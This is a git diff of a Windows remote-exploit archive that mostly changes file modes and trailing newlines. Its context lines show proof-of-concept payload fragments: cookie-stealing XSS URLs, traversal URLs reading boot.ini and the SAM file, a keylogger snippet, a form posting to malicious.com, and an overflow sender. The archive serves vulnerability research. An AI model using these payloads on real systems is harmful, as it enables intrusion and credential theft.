a/platforms/windows/remote/23490.txt b/platforms/windows/remote/23490.txt old mode 100755 new mode 100644 index 915363b1b..20eabc807 --- a/platforms/windows/remote/23490.txt +++ b/platforms/windows/remote/23490.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9313/info A vulnerability has been reported to affect Microsoft IIS. It has been reported that IIS fails to log HTTP TRACK calls made to the affected server. A remote attacker may exploit this condition in order to enumerate server banners. -TRACK / HTTP/1.0 [\r\r] \ No newline at end of file +TRACK / HTTP/1.0 [\r\r] \ No newline at end of file diff --git a/platforms/windows/remote/23492.c b/platforms/windows/remote/23492.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23493.txt b/platforms/windows/remote/23493.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23502.c b/platforms/windows/remote/23502.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23503.txt b/platforms/windows/remote/23503.txt old mode 100755 new mode 100644 index 64f1c0db8..e791017ba --- a/platforms/windows/remote/23503.txt +++ b/platforms/windows/remote/23503.txt @@ -25,4 +25,4 @@ Host: AnyHostWillDo Cookie: login=0 --------------------------------------------------------------------------- \ No newline at end of file +-------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/23509.c b/platforms/windows/remote/23509.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23529.txt b/platforms/windows/remote/23529.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23531.c b/platforms/windows/remote/23531.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23532.txt b/platforms/windows/remote/23532.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23533.txt b/platforms/windows/remote/23533.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23544.txt b/platforms/windows/remote/23544.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2355.pm b/platforms/windows/remote/2355.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23552.xml b/platforms/windows/remote/23552.xml old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23555.txt b/platforms/windows/remote/23555.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23559.txt b/platforms/windows/remote/23559.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23560.txt b/platforms/windows/remote/23560.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23562.html b/platforms/windows/remote/23562.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2358.c b/platforms/windows/remote/2358.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23591.c b/platforms/windows/remote/23591.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23592.c b/platforms/windows/remote/23592.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23594.txt b/platforms/windows/remote/23594.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23596.txt b/platforms/windows/remote/23596.txt old mode 100755 new mode 100644 index b62a91513..9dec0b743 --- a/platforms/windows/remote/23596.txt +++ b/platforms/windows/remote/23596.txt @@ -8,4 +8,4 @@ A denial of service issue exists due to the failure of the server to check input A cross-site scripting issue is also present in the server. This could allow for theft of cookie-based authentication credentials or other attacks. -http://[host]/<script>alert("Test")</script> \ No newline at end of file +http://[host]/<script>alert("Test")</script> \ No newline at end of file diff --git a/platforms/windows/remote/23597.txt b/platforms/windows/remote/23597.txt old mode 100755 new mode 100644 index 26a565acb..0ce9a174f --- a/platforms/windows/remote/23597.txt +++ b/platforms/windows/remote/23597.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/9486/info A vulnerability in Borland Web Server for Corel Paradox has been reported that may allow a remote attacker to view files residing outside of the web server root directory on the affected system. http://<host>/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini -http://<host>/..................../autoexec.bat \ No newline at end of file +http://<host>/..................../autoexec.bat \ No newline at end of file diff --git a/platforms/windows/remote/23612.txt b/platforms/windows/remote/23612.txt old mode 100755 new mode 100644 index e508fdb53..9abe49572 --- a/platforms/windows/remote/23612.txt +++ b/platforms/windows/remote/23612.txt @@ -6,4 +6,4 @@ Successful exploitation could permit theft of cookie-based authentication creden This issue was reported in BRS WebWeaver 1.07. Earlier versions may also be affected. -http://www.example.com/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script> \ No newline at end of file +http://www.example.com/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script> \ No newline at end of file diff --git a/platforms/windows/remote/23632.txt b/platforms/windows/remote/23632.txt old mode 100755 new mode 100644 index 0083a87ee..30ca71ec7 --- a/platforms/windows/remote/23632.txt +++ b/platforms/windows/remote/23632.txt @@ -5,4 +5,4 @@ A vulnerability has been reported in the Crob FTP server, which occurs due to a You can read all directories on the system with the following command: -dir ../../../../../* \ No newline at end of file +dir ../../../../../* \ No newline at end of file diff --git a/platforms/windows/remote/23643.txt b/platforms/windows/remote/23643.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23668.txt b/platforms/windows/remote/23668.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23675.txt b/platforms/windows/remote/23675.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23678.html b/platforms/windows/remote/23678.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23679.html b/platforms/windows/remote/23679.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23695.txt b/platforms/windows/remote/23695.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23714.c b/platforms/windows/remote/23714.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23717.txt b/platforms/windows/remote/23717.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23730.txt b/platforms/windows/remote/23730.txt old mode 100755 new mode 100644 index 8f2eaa28d..0721a0a0d --- a/platforms/windows/remote/23730.txt +++ b/platforms/windows/remote/23730.txt @@ -13,4 +13,4 @@ l.Path = "mshta.exe" l.Arguments ="http://www.example.com" l.Save("C:\\paint.lnk"); ok.Open("C:\\paint.lnk"); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/23732.c b/platforms/windows/remote/23732.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23733.c b/platforms/windows/remote/23733.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23734.c b/platforms/windows/remote/23734.c old mode 100755 new mode 100644 index b3d5f203f..a45f3f869 --- a/platforms/windows/remote/23734.c +++ b/platforms/windows/remote/23734.c @@ -141,7 +141,4 @@ int main( int argc, char *argv[] ) return(0); -} - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/23741.c b/platforms/windows/remote/23741.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23751.txt b/platforms/windows/remote/23751.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23758.txt b/platforms/windows/remote/23758.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23763.c b/platforms/windows/remote/23763.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23766.html b/platforms/windows/remote/23766.html old mode 100755 new mode 100644 index 7e300b5c0..40536638a --- a/platforms/windows/remote/23766.html +++ b/platforms/windows/remote/23766.html @@ -17,4 +17,4 @@ window.status = keylog += String.fromCharCode(k) + '[' + k +']'; <frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*"> <frame src="http://www.example.com" scrolling="auto"> </frameset> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/23768.txt b/platforms/windows/remote/23768.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23776.txt b/platforms/windows/remote/23776.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23790.htm b/platforms/windows/remote/23790.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23796.html b/platforms/windows/remote/23796.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23836.txt b/platforms/windows/remote/23836.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23837.txt b/platforms/windows/remote/23837.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23847.c b/platforms/windows/remote/23847.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23871.txt b/platforms/windows/remote/23871.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23877.txt b/platforms/windows/remote/23877.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23878.txt b/platforms/windows/remote/23878.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23879.txt b/platforms/windows/remote/23879.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23880.txt b/platforms/windows/remote/23880.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/23903.html b/platforms/windows/remote/23903.html old mode 100755 new mode 100644 index eb960f5df..8e5d69c94 --- a/platforms/windows/remote/23903.html +++ b/platforms/windows/remote/23903.html @@ -21,4 +21,4 @@ value=http://www.example.com> <form action="http://www.malicious.com/" method="get"> <a href="http://www.example.com/"><input type="image" src="http://images.example.com/title.gif"></a> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/windows/remote/23905.txt b/platforms/windows/remote/23905.txt old mode 100755 new mode 100644 index c80160b8e..c54e2d5d1 --- a/platforms/windows/remote/23905.txt +++ b/platforms/windows/remote/23905.txt @@ -10,4 +10,4 @@ http://www.example.org:1234/someDirectory%00/ http://www.example.org:1234/someDirectory/%00/ For listing directories outside of the server root (provided by Dr_insane): -http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/ \ No newline at end of file +http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/ \ No newline at end of file diff --git a/platforms/windows/remote/23906.txt b/platforms/windows/remote/23906.txt old mode 100755 new mode 100644 index 4a9ed5aa2..3e286909b --- a/platforms/windows/remote/23906.txt +++ b/platforms/windows/remote/23906.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to gain access to arbitrary scripts containe http://www.example.org:1234/someDirectory/fileName%00 The following has been reported to crash the affected server: -http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/ \ No newline at end of file +http://127.0.0.1:1234/%00/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/imgsvr.exe/ \ No newline at end of file diff --git a/platforms/windows/remote/23909.txt b/platforms/windows/remote/23909.txt old mode 100755 new mode 100644 index 71a082b43..aa3764291 --- a/platforms/windows/remote/23909.txt +++ b/platforms/windows/remote/23909.txt @@ -8,4 +8,4 @@ To view a selected file: http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini To list a directory: -http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/ \ No newline at end of file +http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/ \ No newline at end of file diff --git a/platforms/windows/remote/23926.txt b/platforms/windows/remote/23926.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2401.c b/platforms/windows/remote/2401.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24012.html b/platforms/windows/remote/24012.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24017.html b/platforms/windows/remote/24017.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24024.html b/platforms/windows/remote/24024.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24025.txt b/platforms/windows/remote/24025.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2403.c b/platforms/windows/remote/2403.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24069.html b/platforms/windows/remote/24069.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24076.txt b/platforms/windows/remote/24076.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24077.txt b/platforms/windows/remote/24077.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24097.c b/platforms/windows/remote/24097.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24098.txt b/platforms/windows/remote/24098.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24101.txt b/platforms/windows/remote/24101.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24102.txt b/platforms/windows/remote/24102.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24114.html b/platforms/windows/remote/24114.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24116.txt b/platforms/windows/remote/24116.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24117.txt b/platforms/windows/remote/24117.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24118.txt b/platforms/windows/remote/24118.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24125.txt b/platforms/windows/remote/24125.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24129.bat b/platforms/windows/remote/24129.bat old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24161.txt b/platforms/windows/remote/24161.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24162.txt b/platforms/windows/remote/24162.txt old mode 100755 new mode 100644 index 7a09d6985..b5e63d5c2 --- a/platforms/windows/remote/24162.txt +++ b/platforms/windows/remote/24162.txt @@ -6,4 +6,4 @@ These issues require an attacker to have administrative privileges, however, it Sambar 6.1 Beta 2 is reported to be prone to these issues, however, it is likely that other versions are affected as well. -http://www.example.com/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/windows/remote/24163.txt b/platforms/windows/remote/24163.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24174.txt b/platforms/windows/remote/24174.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24187.txt b/platforms/windows/remote/24187.txt old mode 100755 new mode 100644 index 039d32096..a086e7464 --- a/platforms/windows/remote/24187.txt +++ b/platforms/windows/remote/24187.txt @@ -43,4 +43,4 @@ s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); -location.href = "mms://"; \ No newline at end of file +location.href = "mms://"; \ No newline at end of file diff --git a/platforms/windows/remote/24196.txt b/platforms/windows/remote/24196.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24213.txt b/platforms/windows/remote/24213.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24218.cpp b/platforms/windows/remote/24218.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24219.txt b/platforms/windows/remote/24219.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24220.html b/platforms/windows/remote/24220.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24249.html b/platforms/windows/remote/24249.html old mode 100755 new mode 100644 index 0783255e4..800b6672b --- a/platforms/windows/remote/24249.html +++ b/platforms/windows/remote/24249.html @@ -38,4 +38,4 @@ document.frames[0].document.body.insertAdjacentHTML('afterBegin', document.all.code.value); } setTimeout("doit()", 2000); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/2425.html b/platforms/windows/remote/2425.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24262.html b/platforms/windows/remote/24262.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24263.txt b/platforms/windows/remote/24263.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24265.html b/platforms/windows/remote/24265.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24266.txt b/platforms/windows/remote/24266.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24276.txt b/platforms/windows/remote/24276.txt old mode 100755 new mode 100644 index 1f1c238ce..46c228180 --- a/platforms/windows/remote/24276.txt +++ b/platforms/windows/remote/24276.txt @@ -10,4 +10,4 @@ It should be noted that this issue is reported to exist in all versions of Mozil Update: New reports have stated that the Mozilla Browser is not vulnerable to the first issue as it uses random names for cache directories. This issue does however affect Firefox. It is also reported that an attacker does not have to use a file extension for the second vulnerability as long as a NULL byte is placed after the file name. Arbitrary extensions may be applied as well. -file://C:\\Documents and Settings\\Administrator\\Application Data\\Mozilla\\Firefox\\Profiles\\default.nop\\Cache\\_CACHE_002_%00.html \ No newline at end of file +file://C:\\Documents and Settings\\Administrator\\Application Data\\Mozilla\\Firefox\\Profiles\\default.nop\\Cache\\_CACHE_002_%00.html \ No newline at end of file diff --git a/platforms/windows/remote/24304.txt b/platforms/windows/remote/24304.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24328.txt b/platforms/windows/remote/24328.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24345.txt b/platforms/windows/remote/24345.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24350.txt b/platforms/windows/remote/24350.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24354.txt b/platforms/windows/remote/24354.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24363.txt b/platforms/windows/remote/24363.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24404.txt b/platforms/windows/remote/24404.txt old mode 100755 new mode 100644 index b44e5c2ba..7a0b3525b --- a/platforms/windows/remote/24404.txt +++ b/platforms/windows/remote/24404.txt @@ -6,4 +6,4 @@ It is reported that the Gadu-Gadu instant messenger application contains a weakn This may allow an attacker to send potentially malicious executable files to users who think that they are downloading files that are believed to be harmless. -file.ext%20(220%20kB)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.exe \ No newline at end of file +file.ext%20(220%20kB)%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.exe \ No newline at end of file diff --git a/platforms/windows/remote/24407.txt b/platforms/windows/remote/24407.txt old mode 100755 new mode 100644 index 1ace0ab52..b5a2bce90 --- a/platforms/windows/remote/24407.txt +++ b/platforms/windows/remote/24407.txt @@ -26,4 +26,4 @@ alert(sLocal+" Exists.\nThen do nothing"); 250 ); } -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/24409.txt b/platforms/windows/remote/24409.txt old mode 100755 new mode 100644 index 529849d7f..a3e9bda72 --- a/platforms/windows/remote/24409.txt +++ b/platforms/windows/remote/24409.txt @@ -4,4 +4,4 @@ BadBlue is prone to a vulnerability that may let the application be abused as a BadBlue Personal Edition versions 2.5 and prior are reportedly affected by this issue. -http://www.example.com/ext.dll?mfcisapicommand=PassThru&url=[Any IP:Any Port]/[Any Command] \ No newline at end of file +http://www.example.com/ext.dll?mfcisapicommand=PassThru&url=[Any IP:Any Port]/[Any Command] \ No newline at end of file diff --git a/platforms/windows/remote/24413.txt b/platforms/windows/remote/24413.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24417.txt b/platforms/windows/remote/24417.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24418.txt b/platforms/windows/remote/24418.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24419.txt b/platforms/windows/remote/24419.txt old mode 100755 new mode 100644 index 45daeb66d..224691cc7 --- a/platforms/windows/remote/24419.txt +++ b/platforms/windows/remote/24419.txt @@ -11,4 +11,4 @@ The third reported issue is a directory traversal vulnerability. The affected ap These vulnerabilities are reported to exist in version 1.0 of Xedus. http://www.example.com:4274/../data/log.txt -http://www.example.com:4274/../../../../../boot.ini \ No newline at end of file +http://www.example.com:4274/../../../../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/2445.c b/platforms/windows/remote/2445.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2448.html b/platforms/windows/remote/2448.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24568.html b/platforms/windows/remote/24568.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24571.html b/platforms/windows/remote/24571.html old mode 100755 new mode 100644 index c6dafeedd..cb9c43ad4 --- a/platforms/windows/remote/24571.html +++ b/platforms/windows/remote/24571.html @@ -25,4 +25,4 @@ Kylie.AppendFileToPlayList haveIgotthebestbumorwhat If you're bored could also try - -CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}. \ No newline at end of file +CoAxTrack Class - {B9F3009B-976B-41C4-A992-229DCCF3367C}. \ No newline at end of file diff --git a/platforms/windows/remote/24584.c b/platforms/windows/remote/24584.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2460.c b/platforms/windows/remote/2460.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24600.txt b/platforms/windows/remote/24600.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24607.txt b/platforms/windows/remote/24607.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24623.txt b/platforms/windows/remote/24623.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24624.c b/platforms/windows/remote/24624.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24653.txt b/platforms/windows/remote/24653.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2467.pm b/platforms/windows/remote/2467.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24686.txt b/platforms/windows/remote/24686.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24687.txt b/platforms/windows/remote/24687.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24693.txt b/platforms/windows/remote/24693.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24712.txt b/platforms/windows/remote/24712.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24714.txt b/platforms/windows/remote/24714.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24720.txt b/platforms/windows/remote/24720.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24727.txt b/platforms/windows/remote/24727.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24728.txt b/platforms/windows/remote/24728.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24767.txt b/platforms/windows/remote/24767.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24800.txt b/platforms/windows/remote/24800.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24802.txt b/platforms/windows/remote/24802.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24808.txt b/platforms/windows/remote/24808.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24811.txt b/platforms/windows/remote/24811.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24886.html b/platforms/windows/remote/24886.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24907.txt b/platforms/windows/remote/24907.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24958.py b/platforms/windows/remote/24958.py index 3a13fd322..2b164ac4f 100755 --- a/platforms/windows/remote/24958.py +++ b/platforms/windows/remote/24958.py @@ -40,5 +40,4 @@ buf = "GET /" + junk + ret + " HTTP/1.1\r\n" + "Host: " + host + "\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.132", 8080)) -s.send(buf) - \ No newline at end of file +s.send(buf) \ No newline at end of file diff --git a/platforms/windows/remote/24961.html b/platforms/windows/remote/24961.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/24999.py b/platforms/windows/remote/24999.py index d6d50380f..8eda411da 100755 --- a/platforms/windows/remote/24999.py +++ b/platforms/windows/remote/24999.py @@ -81,4 +81,4 @@ def main(): if __name__ == "__main__": - main() \ No newline at end of file + main() \ No newline at end of file diff --git a/platforms/windows/remote/25009.txt b/platforms/windows/remote/25009.txt old mode 100755 new mode 100644 index 3c2338008..5c7c73f8e --- a/platforms/windows/remote/25009.txt +++ b/platforms/windows/remote/25009.txt @@ -6,4 +6,4 @@ The input validation issue is an HTML injection vulnerability in the instant mes An attacker may leverage these issues to carry out HTML injection attacks, potentially stealing sensitive information, and to carry out denial of service attacks, denying legitimate users of access to the affected software. -www.po"style=background-image:url(javascript:document.write('%3cscript%3ealert%28%22you%20are%20owned!%22%29%3c%2fscript%3e'));".pl \ No newline at end of file +www.po"style=background-image:url(javascript:document.write('%3cscript%3ealert%28%22you%20are%20owned!%22%29%3c%2fscript%3e'));".pl \ No newline at end of file diff --git a/platforms/windows/remote/25013.txt b/platforms/windows/remote/25013.txt old mode 100755 new mode 100644 index e80bb9359..21eef3131 --- a/platforms/windows/remote/25013.txt +++ b/platforms/windows/remote/25013.txt @@ -10,4 +10,4 @@ A local attacker can gain access to a server's administrative password. A server can execute arbitrary applications on a client. -^^#CALL#:CMD.exe \ No newline at end of file +^^#CALL#:CMD.exe \ No newline at end of file diff --git a/platforms/windows/remote/25016.txt b/platforms/windows/remote/25016.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25020.txt b/platforms/windows/remote/25020.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25021.txt b/platforms/windows/remote/25021.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25022.txt b/platforms/windows/remote/25022.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25023.txt b/platforms/windows/remote/25023.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25025.txt b/platforms/windows/remote/25025.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25026.txt b/platforms/windows/remote/25026.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25027.txt b/platforms/windows/remote/25027.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25029.txt b/platforms/windows/remote/25029.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25031.html b/platforms/windows/remote/25031.html old mode 100755 new mode 100644 index ae43f8dd7..3b927ee6a --- a/platforms/windows/remote/25031.html +++ b/platforms/windows/remote/25031.html @@ -53,4 +53,4 @@ alert('Can\'t find winamp default playlist!\nMost probably the winamp is not ins </script> -</body></html> \ No newline at end of file +</body></html> \ No newline at end of file diff --git a/platforms/windows/remote/25032.html b/platforms/windows/remote/25032.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25033.txt b/platforms/windows/remote/25033.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25034.txt b/platforms/windows/remote/25034.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25049.txt b/platforms/windows/remote/25049.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25050.txt b/platforms/windows/remote/25050.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25057.txt b/platforms/windows/remote/25057.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25092.txt b/platforms/windows/remote/25092.txt old mode 100755 new mode 100644 index 05c729943..dc9228707 --- a/platforms/windows/remote/25092.txt +++ b/platforms/windows/remote/25092.txt @@ -28,4 +28,4 @@ Test File Content-Disposition: form-data; name="ATTACH" Attach ------------------------------287661860715985-- \ No newline at end of file +-----------------------------287661860715985-- \ No newline at end of file diff --git a/platforms/windows/remote/25094.c b/platforms/windows/remote/25094.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25095.txt b/platforms/windows/remote/25095.txt old mode 100755 new mode 100644 index 5db91cc8e..086486c9f --- a/platforms/windows/remote/25095.txt +++ b/platforms/windows/remote/25095.txt @@ -18,4 +18,4 @@ onmouseout='aa=0;chglink.href="vbscript:msgbox(\"Psych!\")";clearInterval(intid) Just a simple one: <a href="http://google.com"><button style="border:0;background-color:white;cursor:hand" onclick='location.assign("vbscript:msgbox(\"Psych!\")")'><font -color="blue">click</font></button></a> \ No newline at end of file +color="blue">click</font></button></a> \ No newline at end of file diff --git a/platforms/windows/remote/25129.html b/platforms/windows/remote/25129.html old mode 100755 new mode 100644 index 11ec08dff..0d1ad756d --- a/platforms/windows/remote/25129.html +++ b/platforms/windows/remote/25129.html @@ -55,4 +55,4 @@ setTimeout(' main() ',1000); </object> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/25144.txt b/platforms/windows/remote/25144.txt old mode 100755 new mode 100644 index e01e2e88e..f353a92f4 --- a/platforms/windows/remote/25144.txt +++ b/platforms/windows/remote/25144.txt @@ -4,4 +4,4 @@ A vulnerability has been identified in the handling of certain types of requests Read privileges granted to these files would be restricted by the permissions of the web server process. -http://www.example.com/../../../windows/repair/sam \ No newline at end of file +http://www.example.com/../../../windows/repair/sam \ No newline at end of file diff --git a/platforms/windows/remote/25146.txt b/platforms/windows/remote/25146.txt old mode 100755 new mode 100644 index fb1f0c58f..12fb5875d --- a/platforms/windows/remote/25146.txt +++ b/platforms/windows/remote/25146.txt @@ -11,4 +11,4 @@ A directory traversal vulnerability is also reported to affect WebConnect. This A remote attacker may exploit this vulnerability to disclose the contents of server readable files. http://www.example.com:2080/jretest.html?lang=&parms=default&WCP_USER=..//..//..//..//..//boot.ini&action= -http://www.example.com:2080/COM1 \ No newline at end of file +http://www.example.com:2080/COM1 \ No newline at end of file diff --git a/platforms/windows/remote/25157.txt 